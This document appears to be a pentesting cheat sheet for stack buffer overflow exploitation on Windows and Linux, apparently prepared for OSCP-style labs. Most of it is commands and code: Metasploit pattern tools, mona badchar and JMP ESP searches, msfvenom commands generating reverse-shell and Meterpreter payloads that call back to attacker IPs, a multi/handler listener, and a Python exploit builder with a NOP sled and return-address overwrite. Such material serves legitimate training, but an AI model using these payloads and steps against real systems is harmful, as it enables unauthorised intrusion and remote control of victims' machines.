Buffer overflow
Windows
1. Fuzzing
Find where we can buffer overflow
Create a pattern :
/opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 5000Copy the EIP value and run the following command to find the offset
/opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb -q (EIP)set the offset in exploit.py
set retn to BBBB (42424242) in exploit.py
Verify that we have 42424242 in the EIP (we can control the EIP)
2. Finding bad chars
Generate badchars
#!/bin/env python3
for x in range(1, 256):
print("\\x" + "{:02x}".format(x), end='')
print()Put that into the payload in exploit.py
Mona check for badchars
!mona config -set workingfolder c:\mona\%p
!mona bytearray -b "\x00"
# Run exploit.py
!mona compare -f C:\mona\oscp\bytearray.bin -a <addressESP>if we found badchars (\xe6 for example):
take the first
remove it from the payload
!mona bytearray -b "\x00\xe6"restart program in immunity debugger
rerun exploit.py
REPEAT until no badchars
3. Finding a jump point
(specify all badchars)
!mona jmp -r esp -cpb "\x00"check results in Log data : get the address and set it to the retn value in exploit.py for example : 625014DF --> retn = "\xDF\x14\x50\x62"
4. Exploit
Reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.9.0.43 LPORT=4444 EXITFUNC=thread -b "\x00" -f cMeterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.0.43 LPORT=4444 -f c -b "\x00\x09"If using WINE
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.8.189.215 LPORT=4242 EXITFUNC=thread -f c -e x86/shikata_ga_nai -a x86 -b "\x00"5. Metasploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.9.0.43
set lport 4444
exploit
run post/multi/recon/local_exploit_suggesterLinux
Cause segmentation fault :
dmesg | tailto see at which address segfault happenedreadelf -s ./program: s for symbols, allows to list symbols (and functions)python -c "print 'A'*30" | ./program: prints 30 times A to find the offset
Stack :
+-------
| ESP (extended stack pointer)
+-------
|
| buffer space
|
+-------
| EBP (extended base pointer)
+-------
| EIP (extended instruction pointer) / Return address
| this is the one we want to override
+-------Finding buffer overflow : fuzzing = sending custom strings of varying length and content to each input we wish to test
Exploiting a buffer overflow
Generate a reverse shell in python (buffer)
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.9.0.78 LPORT=4444 -f pythonTo find the offset, use the string generated by /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l xxxx to create a segfault.
Run the target program in gdb, pass the string to generate the segfault and look into the registries : info registries.
Look into rsp : x/xg $rsp and copy the value.
Use this value in /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb -q VALUE to find the offset.
Then, such a python program can be used to generate the exploit string:
from struct import pack
buf = b""
# buf += ...
offset = 616
padding = offset - len(buf) - 100
# to find rip, look into the stack and find the line where the reverse shell payload starts
rip = 0x007fffffffe2d6
# add 0 at the start of the rip to have 8 bytes
payload = '\x90'*padding+ buf+'\x90'*100 + pack("<Q",rip)
# \x90 is important, it's NOP (no operation)
# pack allows to set the rip address in little endian or big endian
print payloadto find the rip address in gdb : x/600x $rsp-600 to print the stack
locally, run nc -lvnp 4444
in gdb, run : run < <(python sploit.py)
gdb
break main : set a breakpoint at main function layout next : displays the layout watch variable : track variable for changes next : next line step : step into function
Other
sudo socat TCP-LISTEN:1337,nodelay,reuseaddr,fork EXEC:"stdbuf -i0 -o0 -e0 ./program"Last updated